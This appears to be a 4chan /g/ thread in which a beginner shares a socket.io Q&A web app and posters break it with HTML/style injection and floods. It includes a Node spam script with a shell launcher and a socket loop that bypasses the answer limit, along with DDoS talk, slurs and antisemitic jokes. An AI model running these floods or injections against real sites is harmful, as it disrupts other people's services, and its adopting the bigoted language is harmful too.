Hello /g/, I'm new to Express and socket.io so I made this little web app to practice. It's a rapid question and answer type app where you can post any question and comment upvotable answers to the questions. But after 20 seconds the question and all the answers are deleted and the next question comes up.
Here it is: https://rapidpoll.herokuapp.com/
Please note after 18 hours it has to go to sleep because I'm using the free Heroku plan and I'm poor as shit
increased question duration to 40 seconds because 20s is too fast
i dont know what i expected
>>53952097
bumping for interest
>>53952097
If I post an answer, shouldn't it be upvoted automatically?
>>53952749
maybe. Upvotes don't really count for anything tho, it's just for bragging points
>>53952097
>upvotable
Just say vote you fucking redditfaggot
>>53952097
Will you be posting this on GitHub?
At least you learned to validate your inputs
OP you might want to HTML escape your inputs to prevent people from injecting scripts.
hahhaha no fucking way
>>53952936
>>53952932
what happened? I missed it
>>53953012
<style>* { transition-duration: 20s; transform: rotate(359deg); transition-timing-function: easeOutBounce}<style>
What the fuck is happening?
>>53952932
>>53952936
I DIDN'T FIX THE INPUTS ITS STILL HAPPENING SENPAI TEACH ME
>>53952804
https://github.com/williamyeny/rapidpoll
who's been drawing deeks?
literally poo in loo
>>53953027
Are you injecting scripts via the post a question input? Trying to fix it
>>53953076
Anon, I had so much fun, I'll buy you a month of cheap VPS hosting if you're really poor.
can someone tell me exactly how they're injecting the scripts so I can fix it?
>>53953088
dude that would be fantastic
>>53953121
Just type whatever script into the question input thingy
People are fucking it up real good lol
>>53953150
I would get out of there before someone posts something bad lmao
>>53953027
you mean on server side tho, it should sanitize inputs on server, you can face fuck the client side anyway you want.
>>53953168
don't give a fuck; not even on my own computer
>>53953121
>>53953182
All I did (not the guy who did Hitler, though) is write a valid HTML tag as an answer. Either script or style. From there on, the world is your oyster.
Plz OP don't fix this shit, it's hilarious
>>53953121
OP, how old are you? Are you a student? Do you have access to GitHub's student developer pack?
Please tell me someone took screenshost of people fucking up the site
<iframe id="video" width="420" height="315" src="//www.youtube.com/embed/HgQEuPw942c?rel=0&arp;autoplay=1" frameborder="0" allowfullscreen></iframe>
>>53953121
idk but you can escape html sequences maybe
literally hitler
This is hilarious
>>53953311
There is literally nothing wrong with Hitler.
Aaand it's gone
mein sides
The cockposter made it unusable
Lol thanks guys, I think I figured out how to validate input. I'll fix it in a bit
![6cea63a23d3050cb675ecad7e33dd88a[1].png](https://i.imgur.com/wX8LNAO.png "6cea63a23d3050cb675ecad7e33dd88a[1].png")
>>53953462
Thanks, OP. This was the most fun I've had in a while.
apex kek at the stormfront redirect
>>53953462
yay
>>53953462
Yea you kno u just can't print anythin to the website w/out escaping special sequences. That's how people do sql injection.
>>53953488
Cocks and stormfront, finally I get to use my js for something usefull
>>53952097
kek'd
Hey guys, look into your cookiejar, I left a present
>>53953507
Yeah well this is the first time I've had people actively try to break the site so it was a great learning opportunity for me
I think this works for now
you fags just crashed my shitty old laptop
fuck y'all
This is NOT ME don't break my server too much
bumping as op requested
>>53952097
PUT A CHARACTER LIMIT YOU FAGET
never forget
>>53953930
i put while(true){$('.upvote').click(); } and think i broke it
>>53954186
wait no i didnt, i just crashed my tab
>>53954186
>>53954199
being this dumb
>>53953121
>what is XSS
>mfw
>>53952097
https://github.com/williamyeny/rapidpoll/blob/master/public/js/script.js#L137-L151var myArray = $("#answer-list li");
var count = 0;
// sort based on timestamp attribute
myArray.sort(function (a, b) {
// convert to integers from strings
a = parseInt($(a).attr("score"), 10);
b = parseInt($(b).attr("score"), 10);
count += 2;
// compare
if(a > b) {
return -1;
} else if(a < b) {
return 1;
} else {
return 0;
}
});
reduce this to b - a, desu. Also what is count for?
Also never commit commented code
>>53954480
I was trying to sort answers by top but it made the site work horribly so I removed it. Also b - a just sorts an array of numbers, but I was trying to sort an array of divs based on the attribute score, so it required something a little more complex. count is something I forgot to remove when I copied and pasted it from here: http://jsfiddle.net/MikeGrace/Vgavb/
>>53954699
I'm talking about:if(a > b) {
return -1;
} else if(a < b) {
return 1;
} else {
return 0;
}
There is no need when both a and b are integers. b - a is equivalent to the sort function.
Also with type coercion you don't need to explicitly convert the scores to ints.
return $(b).attr("score") - $(a).attr("score");
Also http://youmightnotneedjquery.com/#get_attributes
return b.getAttribute('score') - a.getAttribute('score');
>>53954816
oohhhhh ok. Thanks a lot.
stop fucking spamming you maggot shits
>>53954929
Also you need to filter scripts on join. That bypasses your filtering.
Although it would be preferable to do it all server-side
>>53952097
Which cunt was this
https://www.reddit.com/r/webdev/comments/4e2hn8/i_shared_my_web_app_to_4chan_and_forgot_to/
>>53955110
>Didn't even post image of the website with spinning hittler
trash bantpost
>>53955190
Oh whoops it's actually there. Nice.
Well it was fun, OP was a hetero today
I think the server crashed for a bit... poor Heroku server
Ayyy
>>53953150
>>53953168
Now *this* is quality assurance!
>>53955704
plebbit intensifies
>op now has everyone's IP
Great job, faggots.
>>53955756
>worrying about IP
what is this, 2004?
>>53955756
Op here, I'm so stupid I don't even know how to grab IPs. Do you know how?
>>53955756
>Cares about his IP
>Still posts on 4chan
lmao
>>53955807
request.connection.remoteAddress
How about a character limit so people won't spam pasta?
Broken?
>>53955845
thanks lol
>>53955848
done
>>53955918
should be up
>>53955940
Shit aside, this shit has potential.
Its simple yet funny, pay for some ads and it might actually be somewhat successful.
Nice job, OPie
>>53956015
I've never implemented ads before so I'm waiting until Google can approve my Adsense account.
>>53956015
thanks man
>>53956045
bruh im poor as shit I just need 30 more cents to get the next tier of Heroku servers so I can run it 24/7
upboats don't seem to move
its down now
and its dead
> Application error
:(
LIZARDSQUAD DDOS
GET FUCKED OP
it died
ITS FUCKED
sheeeet my question hasn't been answered fgt
rip in pieces
i honestly kinda liked it
too many people ?
Ripperoni Pepperoni
it be back
You should creat different polling stations that revolve around certian subjects like a programming rapid poll and a math rapid poll
it came back alive and then died again
>>53956314
>>53956322
>>53956325
>>53956326
>>53956331
>>53956332
>>53956334
>>53956347
I'm using Heroku's free server, which can't handle hours of load like this. Please hit that $ so I can buy a better server :C
isn't this basically a frankenkstein combination of 4chan + reddit upboat system and no images?
if you added image support to OP it would basically be old 4chan from before captcha ruined it
>>53956380
How do I do that when the sites fucking down
>>53956380
lol you poor ass pos
I can give you free hosting since i see potential in this, drop me your email so i can contact you
>>53956380
Just pay those 30 cents from your own pocket, jew!
>>53956388
it's basically a short lived 4chan thread with no image
>>53956380
I could gib some buttcoin, like 2 dollars if you put the address on the site
>>53956380
i already did
come back now please
>>53956417
and no replies
if you could add cascading replies to the comments i think it would actually be better at being 4chan than 4chan does
>>53956404
[email protected] thanks :o
>>53956409
Im in high school and unemployed :C
>inb4 underage
im 18
>>53956396
trying to boot it up again, give me a minute
>>53956388
Not even close, lol
how are you handling the scripts? i see someone already trying to spam the comments with a bot but they seem to get deleted after 1 second or so
>>53956433
>>53956380
oh LOL IM RETARDED it's $7 for a hobby not $10 im scaling it up now
you are retarted OP
also add a feature like 4chan where it updates the website title when it rotates to a new question
and make it unique when it rotates to the question you asked
do it or im never using your shit web app ever again op
completely epic responses of random numbers
some dick is spamming ...
>>53956557
sorry mate I'll stop...
ded
>>53956538
don't post to my site or my wife' son's site ever againt
site keeps dying
le doot squad ddos
you broke it
>>53956612
Connecting 100 clients is too much for the poor free heroku thing :(
>>53956625
>>53956574
I don't know if you're the one spamming "please donate to OP" to try to make up that spam earlier but please stop if you are because its going to make me look like a jew
someone please take this idea and make a non shit version
op seems like a retarded cunt begging for donations
>>53956681
I know that's why I do it.
guys i backtraced op lets dos him
https://github.com/williamyeny
>>53956688
It's alright man I already bought the hobby dyno we good now. I just don't want people to yell at me when it sleeps because of Heroku's free plan. Please don't steal my idea it's one the only original things I came up with
>>53956728
>https://github.com/williamyeny/rapidpoll
can we fork it though?
lol this faggot is really serious about spamming your website why not just ip ban him? sure he knows how to work around that but he will get tired eventually
OP: Limit answers to one per question, and consolidate duplicate answers automatically.
>>53956762
Yup you're right, I'm just sending shit from my laptop >_>
>>53956759
yeah, but I won't be on my computer 24/7 so I think I'll do >>53956775
>people are unironically opboating
>>53956807
Duplicate answer detection is worthless, I can easily add asocket.emit("submit answer", "some message" + Math.random().toFixed(3));
or something. That won't work at all
>>53956807
Also someone mentioned banning IPs when messages sent went over a threshold, i think i'll do that too
>>53956839
That was me, it would stop my spamming I know for sure, I'm not renting a botnet ;_;
@anyone who wants to copy this and make a better version
>add user score similar to yikyak
>add phone number verification so score can be tracked through
>keep anonymity but mark OP as OP in the answers (similar to yikyak)
>ip session log to prevent spam
>make upvotes actually move the answers position
>>53956894
OP here, if you look at the source I did implement a system where posts are sorted by score. However, it was super hard to read and vote answers because they jump all over the place
Fix your fucking (lack of) security.
>>53956894
>phone number verification
good idea!
also telemetry
>>53956894
>add phone number verification so score can be tracked through
Users after he implements that: 0
>>53956894
>>add phone number verification so score can be tracked through
Or just a random 6 digit code
>>53956928
this
The whole point of an application like this is that it has no barrier to entry. The best I can think of is to add a captcha
>>53956951
if he adds captcha it will literally just be a shittier version of 4chan
>>53956974
It already is a shittier version of 4chan
@OP: If you want to limit, answer posting or question posting to one user without limiting it to one IP, you may want to look into user fingerprinting.
It'll take a lot of user-specific pieces of information and combine them to create an identifier unique to that user.
If you want users that may be under the same IP to still use your app, e.g. coworkers or family members, this is a good route to go.
Valve actually has a javascript library written just for this. https://github.com/Valve/fingerprintjs2
I'm thinking of a one-time captcha when you open the app (not every question). thoughts?
>>53956998
thanks for the info
yall know this is node right? he's only facing scripters now but you can literally inject in ~15 minutes of work. captchas wont save someone from that, you need an ip session not a tab session lock if you want to get serious
>>53957030
>captcha
Fuck no, captcha is owned by the Jewish BOTNET called Google.
>>53956998
Yeah, I'll open source the spamming script
haxx.jsvar io = require('socket.io-client');
function shitpost(state) {
state.count += 1;
state.socket.emit("submit answer", "test");
if (state.count === 3) {
disconnect(state);
}
setTimeout(shitpost, Math.random() * 5500, state);
}
function connect() {
var socket = io.connect('ws://rapidpoll.herokuapp.com/', {
port: 1337,
forceNew: true
});
var state = {count: 0, timeoutId: 0, socket: socket};
socket.on('connect', function (err) {
socket.emit("join");
setTimeout(shitpost, Math.random() * 5500, state);
});
}
function disconnect(state) {
state.socket.disconnect();
connect();
}
connect();
haxx.shfor i in {1..15}
do
( node haxx & )
done
OP, an idea might by to limit the number of answers that can be posted in total, so people focus more on actual voting. At the moment, it's easier to just spam your three answers and vote in that way, which seems not to be the intended use. Maybe make it lock off answer submissions after 5 or so posts?
Perhaps also limit the amount of questions one person can have in the queue at the same time. Not a problem now but if this becomes successful and you have 100-1000 users on simultaneously it will take quite a while waiting if people can have more than one question pending.
OCD fag here, arrow buttons on Chrome are vertically off center, on FF they're okay enough.
fix it in chrome without screwing up FF by updating the .submit-div CSS. Remove float: right; and update change the margin-top from 5px to 2px.
>>53952760
I'll take this bait.
>made a it so you can see the best awnser
So that makes him a redditfag?
>>53952097
The only thing i can think of is add a funny vote and helpful vote
>>53957232
>most upboats = best answer
you need a text limit
>>53957248
>fill text field with 10 GB RAM worth of text
Feels good falling for the 16 GB RAM meme.
javascript are pictures t-too, anon
COME ON OP JUST IP BAN THE GUY ALREADY!
>>53957244
If you continued reading i said add a helpful or funny votes. You're probably one of the kids who I nly hears what her wants and when he hears somthing he doesnt like he needs a "safe place" go back to your nigger sheltered life. But more perfabile dont and just kill yourself now.
>>53957265
>implying that I would stop at 10gb of text
>>53957354
I don't know how. You guys are forgetting I literally just picked up node and express and made this app to practice. I don't know how to do jack shit because im stupid
its ded
>answers is spam
>questions is spam
yep its shit
NOW YOU GUYS HAVE REALLY DONE IT!
"Application Error
An error occurred in the application and your page could not be served. Please try again in a few moments.
If you are the application owner, check your logs for details."
how much in donations have you received ?
>>53957385
That's why you don't post your website on 4chan...
>>53957411
at least OP is learning why testing is important in the real world.
I have just purchased rapidpoll.com
I might allow you to buy it from me OP
>>53957421
Testing was a mem-tier hype. Microsoft stopped testing before production.
>>53957369
>>53957372
Your app's code looks better than >50% of the web devs I've had apply to my workplace. App idea is really novel too. Keep it up, we all start somewhere.
>>53957405
Only 1 donation of $10 ($9 after fees).
>>53957379
yeah, it's gone to shit already. Thanks spammer.
>>53952097
>deleting client's questions when he disconnects
why?
aaaand it's dead again
>>53957451
Thanks, it's a bit messy but it works.
challenge for the scripters: set your script to upvote the highest position comment over and over, instead of spamming
>>53957458
to prevent people from spamming the question queue by refreshing the page
>>53957442
If you think an incompetent poor-ass teenager with little backend experience can successfully manage this app long enough for it to deserve its own domain you're an idiot
>>53952097
>read code
>realize how many holes there are in the backend
>use them to send "faggotry knows no bounds" +1000 at a time
>mfw
>>53957751
That's what I get for open-sourcing my code, I guess. Since it's obvious my backend skills are too weak to handle spammers and dicks always want to spam it, I'm going to leave it off. Hope you're happy.
>>53957806
hope you learned a lesson at least.
>>53957818
you didn't explain to him where did he make the error, so you are still a faggot
>>53957831
for (i=0;i<1000;i++){var socket = io(); socket.emit("submit answer", "faggotry knows no bounds ")}
creating a new socket connection every loop creates a new client id, and the maximum answer limit doesn't apply on me anymore.
Oh and by the way, you're a faggot.
>>53957871
and I found it while being high as fuck, there must be more faggotries in the backend like that
>>53957871
rude desu
>>53957871
>he found broken code in a first timer's code
I mean, there's top kek banter, and then there's being a faggot.
>>53957960
whose line is it anyways?
>>53957806
this shit could be found by just reading the assets on the front end. so you open sourcing the code or not wouldn't have prevented this vulnerability to be found.
Alright, the server restarts itself automatically after 20 min, so that's why it's up. However, if it goes down again, it'll go down for up to 320 min (over 5 hours) so keep that in mind. I have to leave for today, keep shitposting
>>53957871
>>53958004
Thanks, I'll look into this tomorrow. Any ideas to prevent this? Other anons have already given me some pretty good ideas, just want to see if there's any other options.
>>53958087
keeping the ip address of the poster in the answer object in the backend, before adding a new answer to the array, count the number of answers with by IP instead of just client.id
you're welcome little fag
>>53957806
Never go open-sores again.
>>53958150
Dicks want to spam your backend?
>>53958282
Well, he is OP
>>53952097
owning your app like a bitch op, wh?, because my faggotry knows no bounds :^)
>>53953839
>Ethan Bradberry
I literally died
